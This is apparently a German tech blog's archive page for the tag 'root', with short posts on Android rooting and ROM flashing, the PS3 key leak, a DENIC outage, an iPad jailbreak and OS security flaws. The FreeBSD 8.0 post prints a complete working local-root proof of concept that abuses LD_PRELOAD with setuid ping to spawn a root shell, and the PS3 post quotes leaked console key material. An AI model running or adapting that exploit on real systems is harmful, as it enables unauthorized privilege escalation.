Archiv

Artikel Tagged ‘root’

Nexus 5x, root und OTA Systemupdates

31. März 2016 4 Kommentare

nexusNach einer kurzen Exkursion Richtung Samsung Galaxy S6, bin ich wie ein geschlagener Hund wieder zurueck zu meinem Nexus. Das SGS6 ist hardwaretechnisch grandios, super verarbeitet, schick und edel, dem weicht nun ein schlichtes Nexus, dessen Design ja bekannt ist, spaetestens jetzt :).
Plastik dem edlen Material und warum das? Weil die Software auf dem SGS6 ein Grauen ist.
Es gibt noch immer keine Vanilla Roms fuer das SGS, wird es wohl auch kaum noch geben nehme ich an, also muesste man mit TouchWiz leben und das kann ich einfach nicht.
Viel zu gruselig schon das Kontaktbuch, viele komische kaputte Verknuepfungen die sich nicht aufloesen lassen, um nur ein Beispiel zu nennen.

So nun genug geredet, natuerlich war der erste Weg: Root und wir kennen es ja, sobald man root auf seinem Geraet hat, ist das mit OTA Updates so eine Sache. Mehr…

Galaxy Nexus Update auf 4.2.2/4.3 und der Franco Kernel *updated*

20. Februar 2013 Keine Kommentare

francoSeit einigen Tagen wird ja eine neue Version von IceCream Sandwich (Android 4.2.2) ausgerollt und natuerlich musste ich einer der ersten sein die das testen, doch dann kam schnell wieder die Ernuechterung.
Da ich mindestens eine Systemapplikation gepatched habe fiel das Update natuerlich auf die Nase und ich musste erst einmal mein Backup bemuehen.
Soweit so gut, jedoch lange sollte die Freude nicht anhalten und der Updateprozess beendete sich mit folgendem Hinweis:

assert failed: apply_patch_check("/system/lib/hw/power.tuna.so", "5452b798b4d319d3af27c55ba9d0ddc4b6fe6422", "e5c07efe10ed6cbc2306a087b31b685db8449564")
(Status 7)
Installation aborted.
Mehr…

HTC Desire – InsertCoin (Android 2.3) v47 flashen

11. Juni 2011 5 Kommentare

Schon lange ist meine Desiree mit 2.2 ein wenig hinten dran und leider gibt es keine offiziellen 2.3.x Images und bisher hatte ich auch kein Glueck was portierte Images angeht, da diese meistens ohne die Sense Oberflaeche kommen und ich bin doch ein grosser Fan davon. Mir gefaellt Sense und auch die Integration der Kontakte mit Twitter, Facebook und Co ist fuer mich schon ein muss. Nachdem ich nun einige Senseless Images getestet habe bin ich auf InsertCoin gestossen.
Android 2.3.3 mit Sense UI Mix aus 2.1 und 3.0 und ja was soll ich sagen, ich bin begeistert.
Also machen wir uns ans Werk, InsertCoint bringt unter anderem echtes Apps2SD mit, nicht dieses Froyo Gefrickel bei dem nur ein Teil der Applikation auf die SD Karte geschoben wird, sondern oldschool Apps2SD mitlerweile auch bekannt als Apps2SD++, dies ist auch einer der Gruende welche dazu fuehren das wir den HBoot neu flashen muessen, was aber eigentlich auch kein Problem ist. Mehr…

Geohot, Jailbreaks und der PS3 Rootkey?

3. Januar 2011 Keine Kommentare

Geohot der schon vor langem behauptet hat er habe die PS3 gehackt und wuerde bald an die Oeffentlichkeit gehen wurde nun schon etwas laenger in der Szene als Schaumschlaeger betitelt, zumindest was die PS3 angeht, ein faehiger Applehacker war er ja immer noch.
Nun findet sich auf seinem Blog ohne viel Kommentar folgender Eintrag:

erk: C0 CE FE 84 C2 27 F7 5B D0 7A 7E B8 46 50 9F 93 B2 38 E7 70 DA CB 9F F4 A3 88 F8 12 48 2B E2 1B
riv: 47 EE 74 54 E4 77 4C C9 B8 96 0C 7B 59 F4 C1 4D
pub: C2 D4 AA F3 19 35 50 19 AF 99 D4 4E 2B 58 CA 29 25 2C 89 12 3D 11 D6 21 8F 40 B1 38 CA B2 9B 71 01 F3 AE B7 2A 97 50 19 Mehr…

Denic Nameserver tot -> Deutschland bald Internetfrei *update*

Wie es aussieht hat die Denic ein paar groessere Probleme mit Ihren Nameservern, denn hier kommen keine Antworten mehr, auch beklagen sich eine Reihe von Usern ueber das nicht erreichen von DE Domains waerend alles andere geht.
Leider gibt es noch keine mir bekannte offizielle Quelle und es bleibt abzuwarten bis hier etwas offizielles kommt aber ein paar Quotes:

hmmmmm unser Hoster hat wohl Probleme… ca 200 Kundenpräsenzen können keine E-Mails senden =) #dauerklingeln #telefon

Denic Nameservers are returning nothing anymore. The german internet will die soon…

Seems only 2 of 6 nameservers for .de answer requests correctly anymore

Scheinbar hat die Denic mist gebaut und zwar in folgender Form:

die DENIC hat die DE-Zone versehentlich signiert und alle nicht-DNSSEC-faehigen Resolver haben nun Probleme. DENIC-seitig wird das Problem bearbeitet.

KategorienNews Tags: , , , ,

iPad – die ersten Probleme und der Jailbreak

7. April 2010 1 Kommentar

Seit 2 Tagen gibt es nun ganz offiziell das Apple iPad und wieder einmal ist ein Hype ausgebrochen, den ich mir beim besten Willen nicht erklaeren kann. Ich persoenlich haette keine Verwendung fuer ein iPad und generell gehoere ich ohnehin nicht zu den Applefreunden wie man weiss.
Jobs verkauft hier in meinen Augen zusammengewuerfelte Innovationen von anderen Herstellern in einem schicken Case als sein Ding, aber ok, das muss jeder selbst wissen, wie vorrauszusehen war, gibt es natuerlich schon die ersten Probleme. iPads nutzt man lieber nur im Winter, denn im schon bei 26° Aussentemperatur meldet so ein iPad ganz schnell: „iPad needs to cool down before you can use it“ und schaltet sich aus. Auch mit WLan soll es schon die ersten Probleme geben, was mich jedoch noch viel mehr freut ist das bereits gestern das iPad gejailbreaked wurde.
Eine Luecke im Safari Browser machte es dem Hacker des iPhone Dev-Teams: „MuscleNerd“ moeglich root aus seinem iPad zu erlangen.
Ja in Sachen Security hatte Apple noch nie etwas zu bieten.

KategorienCrapple, News Tags: , , , ,

FreeBSD 8.0 Local Root 0day *update*

1. Dezember 2009 Keine Kommentare

Nikolaos Rangos aka Kingcope hat einen 0Day Exploit fuer FreeBSD 8.0/7.1 herausgegeben, laut Informationen die mir vorliegen sind teilweise auch FreeBSD 7.0 Systeme betroffen.
Der Fehler befindet sich im Run-Time Link Editor (rtld), im Normalfall erlaubt rtld keine gefaehrlichen Umgebungsvariablen wie LD_PRELOAD jedoch wenn setugid Binaries wie „su“ oder „ping“ ausgefuehrt werden aendert sich dies. Mit einer simplen Technik kann rtld also ausgtrickst werden und erlaubt LD Variablen auf setugid, folgener POC wurde bereitgestellt:

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF #include

main() {
extern char **environ;
environ = (char**)malloc(8096);

environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF #include
#include
#include
#include

void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

Von Colin Percival des FreeBSD Entwicklerteams:

The patch is at
http://people.freebsd.org/~cperciva/rtld.patch
and has SHA256 hash
ffcba0c20335dd83e9ac0d0e920faf5b4aedf366ee5a41f548b95027e3b770c1

I expect a full security advisory concerning this issue will go out on
Wednesday December 2nd.

Der Patch ist wahrscheinlich noch nicht die Final Version und er wird nur unter der premisse: „use at your own risk (even more than usual)“ veroeffentlicht. Morgen soll ein Advisory mit final Patch released werden.

Sicherheitsproblem in Fedora 12

19. November 2009 Keine Kommentare

Ein Sicherheitsproblem in der neuen Standard Policy im neu veroeffentlichten Fedora 12 erlaubt es unpriviligierten Usern gesignte Pakete ohne Rootzugriff zu installieren.
Die Fedora Mailingliste laeuft in diesem Thread nahezu ueber, nett finde ich den Satz:
„When was it decided that non-root users get to play root?“, gute Frage.
Fuer wie gross man dieses Problem nun haelt sei jedem selbst ueberlassen, aber mit dem richtigen Know How laesst sich hier einiges anstellen.